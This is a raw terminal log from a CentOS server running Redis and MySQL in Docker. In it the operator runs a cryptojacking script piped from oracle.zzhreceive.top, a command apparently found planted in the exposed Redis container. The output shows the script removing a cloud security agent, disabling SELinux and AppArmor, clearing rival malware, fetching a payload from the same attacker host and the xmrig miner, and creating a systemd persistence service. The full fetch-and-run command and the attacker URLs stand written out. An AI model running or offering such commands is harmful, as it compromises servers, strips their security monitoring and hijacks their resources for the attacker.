Connecting to 110.42.150.233:22
Connection established
Last login: Sun Apr 24 09:48:40 2022 from 221.225.230.221
[root@VM-16-11-centos ~]# docker exec -it myredis redis-cli
127.0.0.1:6379> c
[root@VM-16-11-centos ~]# docker exec -it myredis
"docker exec" requires at least 2 arguments.
See 'docker exec --help'.

Usage:  docker exec [OPTIONS] CONTAINER COMMAND [ARG...]

Run a command in a running container
[root@VM-16-11-centos ~]# docker exec -it myredis bash
root@66b92c8dfe83:/data# */5 * * * * root wd1 -q -O- http://oracle.zzhreceive.top/b2f628fff19fda999999999/b.sh | sh
bash: */5: No such file or directory
root@66b92c8dfe83:/data# wd1 -q -O- http://oracle.zzhreceive.top/b2f628fff19fda999999999/b.sh | sh
bash: wd1: command not found
root@66b92c8dfe83:/data# curl http://oracle.zzhreceive.top/b2f628fff19fda999999999/b.sh
bash: curl: command not found
root@66b92c8dfe83:/data# ^C
root@66b92c8dfe83:/data# exit
exit
[root@VM-16-11-centos ~]# http://oracle.zzhreceive.top/b2f628fff19fda999999999/b.sh
-bash: http://oracle.zzhreceive.top/b2f628fff19fda999999999/b.sh: No such file or directory
[root@VM-16-11-centos ~]# curl http://oracle.zzhreceive.top/b2f628fff19fda999999999/b.sh | sh
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100  3114  100  3114    0     0  10366      0 --:--:-- --:--:-- --:--:-- 10380
it's not ali cloud
Loaded plugins: fastestmirror, langpacks
No Match for argument: wget
No Packages marked for removal
Loaded plugins: fastestmirror, langpacks
Loading mirror speeds from cached hostfile
docker-ce-stable                                                                                                                    | 3.5 kB  00:00:00
epel                                                                                                                                | 4.7 kB  00:00:00
extras                                                                                                                              | 2.9 kB  00:00:00
os                                                                                                                                  | 3.6 kB  00:00:00
updates                                                                                                                             | 2.9 kB  00:00:00
Resolving Dependencies
--> Running transaction check
---> Package wget.x86_64 0:1.14-18.el7_6.1 will be installed
--> Finished Dependency Resolution

Dependencies Resolved

===========================================================================================================================================================
 Package                           Arch                                Version                                       Repository                       Size
===========================================================================================================================================================
Installing:
 wget                              x86_64                              1.14-18.el7_6.1                               os                              547 k

Transaction Summary
===========================================================================================================================================================
Install  1 Package

Total download size: 547 k
Installed size: 2.0 M
Downloading packages:
wget-1.14-18.el7_6.1.x86_64.rpm                                                                                                     | 547 kB  00:00:00
Running transaction check
Running transaction test
Transaction test succeeded
Running transaction
Warning: RPMDB altered outside of yum.
  Installing : wget-1.14-18.el7_6.1.x86_64                                                                                                             1/1
  Verifying  : wget-1.14-18.el7_6.1.x86_64                                                                                                             1/1

Installed:
  wget.x86_64 0:1.14-18.el7_6.1

Complete!
bash: line 244: ufw: command not found
kernel.nmi_watchdog = 0
root      3028  0.5  2.4 980968 45792 ?        Sl   Apr16  67:07 /usr/local/qcloud/YunJing/YDEyes/YDService
root      3036  0.0  0.6 971908 11828 ?        Sl   Apr16   1:50 /usr/local/qcloud/YunJing/YDLive/YDLive
remove YunJing software success
bash: line 321: /usr/local/cloudmonitor/wrapper/bin/cloudmonitor.sh: No such file or directory
setenforce: SELinux is disabled
Redirecting to /bin/systemctl stop apparmor.service
Failed to stop apparmor.service: Unit apparmor.service not loaded.
Failed to execute operation: No such file or directory
Redirecting to /bin/systemctl stop aliyun.service
Failed to stop aliyun.service: Unit aliyun.service not loaded.
Failed to execute operation: No such file or directory
Failed to execute operation: No such file or directory
Failed to execute operation: No such file or directory
/bin/tntcht: No such file or directory while trying to stat /bin/sysdr
cat: /tmp/.X11-unix/01: No such file or directory
cat: /tmp/.X11-unix/11: No such file or directory
cat: /tmp/.X11-unix/22: No such file or directory
cat: /tmp/.pg_stat.0: No such file or directory
cat: /tmp/.pg_stat.1: No such file or directory
cat: /root/data/./oka.pid: No such file or directory
grep: Trailing backslash
/bin/tntcht: No such file or directory while trying to stat /etc/ld.so.preload
rm: cannot remove ‘/opt/atlassian/confluence/bin/1.sh’: No such file or directory
rm: cannot remove ‘/opt/atlassian/confluence/bin/1.sh.1’: No such file or directory
rm: cannot remove ‘/opt/atlassian/confluence/bin/1.sh.2’: No such file or directory
rm: cannot remove ‘/opt/atlassian/confluence/bin/1.sh.3’: No such file or directory
rm: cannot remove ‘/opt/atlassian/confluence/bin/3.sh’: No such file or directory
rm: cannot remove ‘/opt/atlassian/confluence/bin/3.sh.1’: No such file or directory
rm: cannot remove ‘/opt/atlassian/confluence/bin/3.sh.2’: No such file or directory
rm: cannot remove ‘/opt/atlassian/confluence/bin/3.sh.3’: No such file or directory
rm: cannot remove ‘/var/tmp/lib’: No such file or directory
rm: cannot remove ‘/var/tmp/.lib’: No such file or directory
/bin/tntcht: No such file or directory while trying to stat /tmp/lok
chmod: cannot access ‘/tmp/lok’: No such file or directory
/bin/tntcht: No such file or directory while trying to stat /tmp/kdevtmpfsi
/bin/tntcht: No such file or directory while trying to stat /tmp/redis2
/bin/tntcht: No such file or directory while trying to stat /.Xll/xr
bash: line 844: /.Xll/xr: No such file or directory
/bin/tntcht: No such file or directory while trying to stat /.Xll/xr
/bin/tntcht: No such file or directory while trying to stat /etc/trace
/bin/tntcht: No such file or directory while trying to stat /etc/newsvc.sh
/bin/tntcht: No such file or directory while trying to stat /etc/svc*
/bin/tntcht: No such file or directory while trying to stat /tmp/newsvc.sh
/bin/tntcht: No such file or directory while trying to stat /tmp/svc*
/bin/tntcht: No such file or directory while trying to stat /etc/phpupdate
/bin/tntcht: No such file or directory while trying to stat /etc/phpguard
/bin/tntcht: No such file or directory while trying to stat /etc/networkmanager
/bin/tntcht: No such file or directory while trying to stat /etc/newdat.sh
/bin/tntcht: No such file or directory while trying to stat /etc/zzh
/bin/tntcht: No such file or directory while trying to stat /etc/newinit
/bin/tntcht: No such file or directory while trying to stat /usr/lib/systemd/systemd-update-daily
/bin/tntcht: No such file or directory while trying to stat /root/.tmp
ls: cannot access /proc/PID/exe: No such file or directory
ls: cannot read symbolic link /proc/2/exe: No such file or directory
ls: cannot read symbolic link /proc/4/exe: No such file or directory
ls: cannot read symbolic link /proc/6/exe: No such file or directory
ls: cannot read symbolic link /proc/7/exe: No such file or directory
ls: cannot read symbolic link /proc/8/exe: No such file or directory
ls: cannot read symbolic link /proc/9/exe: No such file or directory
ls: cannot read symbolic link /proc/10/exe: No such file or directory
ls: cannot read symbolic link /proc/13/exe: No such file or directory
ls: cannot read symbolic link /proc/14/exe: No such file or directory
ls: cannot read symbolic link /proc/15/exe: No such file or directory
ls: cannot read symbolic link /proc/16/exe: No such file or directory
ls: cannot read symbolic link /proc/17/exe: No such file or directory
ls: cannot read symbolic link /proc/18/exe: No such file or directory
ls: cannot read symbolic link /proc/19/exe: No such file or directory
ls: cannot read symbolic link /proc/20/exe: No such file or directory
ls: cannot read symbolic link /proc/21/exe: No such file or directory
ls: cannot read symbolic link /proc/22/exe: No such file or directory
ls: cannot read symbolic link /proc/23/exe: No such file or directory
ls: cannot read symbolic link /proc/24/exe: No such file or directory
ls: cannot read symbolic link /proc/30/exe: No such file or directory
ls: cannot read symbolic link /proc/31/exe: No such file or directory
ls: cannot read symbolic link /proc/32/exe: No such file or directory
ls: cannot read symbolic link /proc/33/exe: No such file or directory
ls: cannot read symbolic link /proc/41/exe: No such file or directory
ls: cannot read symbolic link /proc/43/exe: No such file or directory
ls: cannot read symbolic link /proc/44/exe: No such file or directory
ls: cannot read symbolic link /proc/45/exe: No such file or directory
ls: cannot read symbolic link /proc/46/exe: No such file or directory
ls: cannot read symbolic link /proc/59/exe: No such file or directory
ls: cannot read symbolic link /proc/101/exe: No such file or directory
ls: cannot read symbolic link /proc/193/exe: No such file or directory
ls: cannot read symbolic link /proc/244/exe: No such file or directory
ls: cannot read symbolic link /proc/251/exe: No such file or directory
ls: cannot read symbolic link /proc/252/exe: No such file or directory
ls: cannot read symbolic link /proc/253/exe: No such file or directory
ls: cannot read symbolic link /proc/254/exe: No such file or directory
ls: cannot read symbolic link /proc/259/exe: No such file or directory
ls: cannot read symbolic link /proc/260/exe: No such file or directory
ls: cannot read symbolic link /proc/278/exe: No such file or directory
ls: cannot read symbolic link /proc/279/exe: No such file or directory
ls: cannot read symbolic link /proc/520/exe: No such file or directory
ls: cannot read symbolic link /proc/16555/exe: No such file or directory
ls: cannot read symbolic link /proc/6995/exe: No such file or directory
ls: cannot read symbolic link /proc/7865/exe: No such file or directory
ls: cannot read symbolic link /proc/16766/exe: No such file or directory
ls: cannot read symbolic link /proc/17517/exe: No such file or directory
ls: cannot access /proc/20944/exe: No such file or directory
/bin/tntcht: No such file or directory while trying to stat /var/spool/cron/crontabs
/bin/tntcht: No such file or directory while trying to stat /var/spool/cron/crontabs
--2022-04-25 17:21:29--  http://oracle.zzhreceive.top/s3f815/s/avg4.tar.gz
Resolving oracle.zzhreceive.top (oracle.zzhreceive.top)... 209.141.37.237
Connecting to oracle.zzhreceive.top (oracle.zzhreceive.top)|209.141.37.237|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 2568 (2.5K) [application/octet-stream]
Saving to: ‘/usr/share/[ddns].pid’

100%[=================================================================================================================>] 2,568       --.-K/s   in 0s

2022-04-25 17:21:29 (295 MB/s) - ‘/usr/share/[ddns].pid’ saved [2568/2568]

http://oracle.zzhreceive.top/s3f815/s/avg4.tar.gz
--2022-04-25 17:21:29--  https://github.com/xmrig/xmrig/releases/download/v6.8.2/xmrig-6.8.2-linux-static-x64.tar.gz
Resolving github.com (github.com)... 20.205.243.166
Connecting to github.com (github.com)|20.205.243.166|:443... connected.
HTTP request sent, awaiting response... 302 Found
Location: https://objects.githubusercontent.com/github-production-release-asset-2e65be/88327406/5b8fa180-6d6b-11eb-8be2-cf718c7d3d0a?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=AKIAIWNJYAX4CSVEH53A%2F20220425%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20220425T092129Z&X-Amz-Expires=300&X-Amz-Signature=d575469a948d1a4e4fc727aca46e4dbf553529fe52e69b80e297f66b9a316a06&X-Amz-SignedHeaders=host&actor_id=0&key_id=0&repo_id=88327406&response-content-disposition=attachment%3B%20filename%3Dxmrig-6.8.2-linux-static-x64.tar.gz&response-content-type=application%2Foctet-stream [following]
--2022-04-25 17:21:31--  https://objects.githubusercontent.com/github-production-release-asset-2e65be/88327406/5b8fa180-6d6b-11eb-8be2-cf718c7d3d0a?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=AKIAIWNJYAX4CSVEH53A%2F20220425%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20220425T092129Z&X-Amz-Expires=300&X-Amz-Signature=d575469a948d1a4e4fc727aca46e4dbf553529fe52e69b80e297f66b9a316a06&X-Amz-SignedHeaders=host&actor_id=0&key_id=0&repo_id=88327406&response-content-disposition=attachment%3B%20filename%3Dxmrig-6.8.2-linux-static-x64.tar.gz&response-content-type=application%2Foctet-stream
Resolving objects.githubusercontent.com (objects.githubusercontent.com)... 185.199.111.133, 185.199.109.133, 185.199.108.133, ...
Connecting to objects.githubusercontent.com (objects.githubusercontent.com)|185.199.111.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 2511557 (2.4M) [application/octet-stream]
Saving to: ‘/usr/share/crypto’

100%[=================================================================================================================>] 2,511,557   11.2MB/s   in 0.2s

2022-04-25 17:21:31 (11.2 MB/s) - ‘/usr/share/crypto’ saved [2511557/2511557]

Created symlink from /etc/systemd/system/multi-user.target.wants/pnsd.service to /etc/systemd/system/pnsd.service.

^C[root@VM-16-11-centos ~]# ls
javaweb-0.0.1-SNAPSHOT.jar  screenlog.0  slip-0.0.1-SNAPSHOT.jar
[root@VM-16-11-centos ~]# docker ps
CONTAINER ID   IMAGE       COMMAND                  CREATED        STATUS        PORTS                                                  NAMES
66b92c8dfe83   redis       "docker-entrypoint.s…"   31 hours ago   Up 31 hours   0.0.0.0:6379->6379/tcp, :::6379->6379/tcp              myredis
623e19859366   mysql:5.7   "docker-entrypoint.s…"   9 days ago     Up 9 days     0.0.0.0:3306->3306/tcp, :::3306->3306/tcp, 33060/tcp   mysql
[root@VM-16-11-centos ~]# docker restart redis
Error response from daemon: No such container: redis
[root@VM-16-11-centos ~]# docker restart myredis
myredis
[root@VM-16-11-centos ~]# cd /usr/share/crypto
-bash: cd: /usr/share/crypto: Not a directory
[root@VM-16-11-centos ~]#
